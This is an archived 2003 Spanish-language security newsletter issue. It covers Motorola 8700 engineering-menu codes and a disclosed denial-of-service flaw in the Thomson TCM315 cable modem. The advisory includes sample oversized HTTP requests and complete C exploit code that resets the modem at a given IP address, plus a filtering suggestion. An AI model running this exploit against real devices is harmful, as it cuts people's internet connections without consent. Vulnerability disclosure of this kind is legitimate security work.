Neperos
SIGN IN
Copy Link
Add to Bookmark
Report

RootMode - Nro: 8vo boletín

eZine's profile picture
eZine lover (@eZine)
Published in 
RootMode
 · 2 years ago

Boletín de seguridad informática de [RootMode]
Nro: 8vo boletín
Lunes, 15 de Diciembre de 2003
http://rootmode.com.ar

INDICE:

  1. Introducción
  2. El site
  3. Txt colgad0
  4. Artículos
  5. Buggie links
  6. Links
  7. The End


- ------------------------------------------------------------------
[1] Bueno, ya es el 8vo boletín de [RootMode] y el 2do boletín quincenal.
[El cual para no cortar la costumbre, sale a destiempo ;)]

- ---
[?] Razón?
Como les comente en el último correo, hay una mujer en mi vida, razón por la cual el tiempo se acorta mucho.
Pido disculpas por ello.


[2] El site

Las secciones del site nuevamente tienen password, para limitar el ancho de banda, y que este sea usado solo por miembros del boletín.
[+]Más info: http://rootmode.com.ar/password.php

- ---
[?]Como acceder a las secciones?
El acceso es el mismo de siempre, solo que cuando intentes descargar un archivo, te pedira el usuario y password.
- ---

[*]Recomendación:
http://rootmode.com.ar/cisco.php


[3] Txt colgad0

Motorola 8700
By nndRock

#06# for checking the IMEI (International Mobile Equipment Identity)

Activate RBS

(Note: pause means the * key held in until box appears)
To activate RBS type: 

[pause] [pause] [pause] 1 1 3 [pause] 1 [pause] [ok]


You now have to press the [MENU] and scroll to the 'Eng Field Options'

function with the keys, and enable it.

De-activate RBS

To de-activate RBS type: 

[pause] [pause] [pause] 1 1 3 [pause] 0 [pause] [ok]


This only works with some versions of software.

These countries has been reported working: AU, IT, SG, DE, ES, ZA

What's the use of RBS:

Get Distance From Base Station

Place a call, when it is answered, press [MENU] until 'Eng Field Option'
is displayed, press [OK], select 'Active Cell', press [OK], press [MENU] until 'Time Adv xxx' appears, where xxx is a number. Multiply this number by 550, and the result is the distance from the RBS (Radio Base Station), in meters.

Get Signal Quality

press [MENU] until 'Eng Field Option' is displayed, press [OK], select 'Active Cell', press [OK], press [MENU] until 'C1' appears. This is the signal quality. If it becomes negative for longer than 5 seconds, a new cell is selected.


[4] Artículos

Denegación de servicio en Thomson TCM315

1 - Introducción

Thomson TCM315 es un cable modem con funcionalidades DOCSIS 2.0.
Sus principales características son:

  • DOCSIS 1.0 certified
  • DOCSIS 2.0 ready and DOCSIS 1.1 compliant
  • NAT/PAT/Firewall and integrated router for SOHO installations (in a separate software release)
  • Bridging between the USB and Ethernet port
  • Easy Access to Advanced Diagnostics Web Pages
  • USB port for easy installation
  • Reliable high-performance platform
  • Surf the Internet Up to 100 Times Faster than a 56k analog Modem
  • Internet On-Off button for enhanced security

Más información en http://www.qb.ro/docs/tcm315.pdf


2 - Descripción de la vulnerabilidad

El problema aparece al enviar una petición HTTP con una cadena larga al cable modem, causando una denegación de servicio.

Ejemplo: 

GET 
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
\ 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1


or 

http://<cablemodem.IP>/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAA \ 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

3 - Forma de explotar esta vulnerabilidad

Para probar esta vulnerabilidad, usamos el siguiente código. Nota: el código está escrito en C para sistemas Windows, es fácilmente
portable a sistemas Unix. 

- --------------------- CUT HERE --------------------- 
/* 
ADVISORY - Thomson Cablemodem TCM315 Denial of Service 

Shell security group (2003) www.shellsec.net 

November 10 of 2003 

Tested against: TCM315 MP 
Software Version: ST31.04.00 
Software Model: A801 
Bootloader: 2.1.4c 
Impact: Users with access to the network can remotely shutdown 
internet connection. 

Discovered by: aT4r Andres[at]shellsec.net 
Vendor: contacted (no answer) 
Fix: no yet 

usage: just, thdos.exe 192.168.100.1 

*/ 

#include <stdio.h> 
#include <winsock2.h> 

void main(int argc,char *argv[]) { 
char evil[150],buffer[1000]; 
struct sockaddr_in shellsec; 
int fd; 
WSADATA ws; 

WSAStartup( MAKEWORD(1,1), &( ws) ); 

shellsec.sin_family = AF_INET; 
shellsec.sin_port = htons(80); 
shellsec.sin_addr.s_addr = inet_addr(argv[1]); 

memset(evil,'\0',sizeof(evil)); 
memset(evil,'A',100); 
sprintf(buffer,"GET /%s HTTP/1.1\r\n\r\n\r\n",evil); 

fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); 
if (connect(fd,( struct sockaddr *)&shellsec,sizeof(shellsec)) != -1) 
{ 
send(fd,buffer,strlen(buffer),0); 
printf("done. Thomson Cablemodem reset!\n"); 
sleep(100); 
} 
else printf("Unable to connect to CM.\n"); 
} 

- --------------------- CUT HERE ---------------------

4 - Solución

Thomson fue advertido sobre esta vulnerabilidad, pero no se ha pronunciado al respecto ni ha puesto un parche a disposición de los usuarios aún. Como posible solución se plantea filtrar las peticiones que se puedan realizar al cable modem.
Url: http://www.shellsec.net

[5] Buggie links


[6] Links

[7] The End

Para terminar, esta frase que me envió mi amigo [Insomnia]. Es tal cual! ;)

- ---
"Los video juegos no tienen ninguna influencia sobre los niños.
Quiero decir, si el Pac-Man hubiese influenciado a nuestra generación, estaríamos todos corriendo en salas oscuras, masticando píldoras mágicas y escuchando músicas electrónicas repetitivas"
Kristian Wilson, Nintendo Inc., 1989
- ---

Saludos..


Zero_Byte mailto:info@rootmode.com.ar 

- ------------------------------------ 
[Zero_Byte] info@rootmode.com.ar 
Seguridad informática y Undeground 
  ==> http://rootmode.com.ar <== 
- ------------------------------------

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

eZine's profile picture
eZine lover (@eZine)
22 Nov 2024
It was brought to my attention that there’s a mistake as this article appears to be empty. Unfortunately, it’s not a mistake. The first i ...
eZine's profile picture
eZine lover (@eZine)
22 Nov 2024
Thanks for the comment. I'm glad to know that my archiving work is useful to someone! You can find more ezines by checking out my profi ...
guest's profile picture
@guest
21 Nov 2024
I can't believe you archived it! Chronicles of Chaos was my favorite online magazine back in the day.
lostcivilizations's profile picture
Lost Civilizations (@lostcivilizations)
21 Nov 2024
Thank you very much for your comment. I haven’t read the book by Hakan Öniz and didn’t know the Shardana could have traveled so far as to re ...
guest's profile picture
@guest
20 Nov 2024
Shardana or Sheridan are the sea peoples who arrive in Eire or Ireland and also move into Scotland
Adelaide's profile picture
@Adelaide
20 Nov 2024
È buono
guest's profile picture
@guest
20 Nov 2024
TODAY IT-S FREEZING. UNFORTUNATELY I NEED TO GO TO THE OFFICE! WHAT ABOUT YOU?
guest's profile picture
@guest
19 Nov 2024
reading Birmingham I thought that it was the city in UK :D
guest's profile picture
@guest
19 Nov 2024
are they made all year or typical of a special occasion?
guest's profile picture
@guest
19 Nov 2024
Deliziosa!!!!!Assolutamente da provare questa domenica! Grazie per l'idea :D
a Francesco Arca production 2016 - 2024
Terms of Service - Privacy Policy
neperos on mastodon
Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT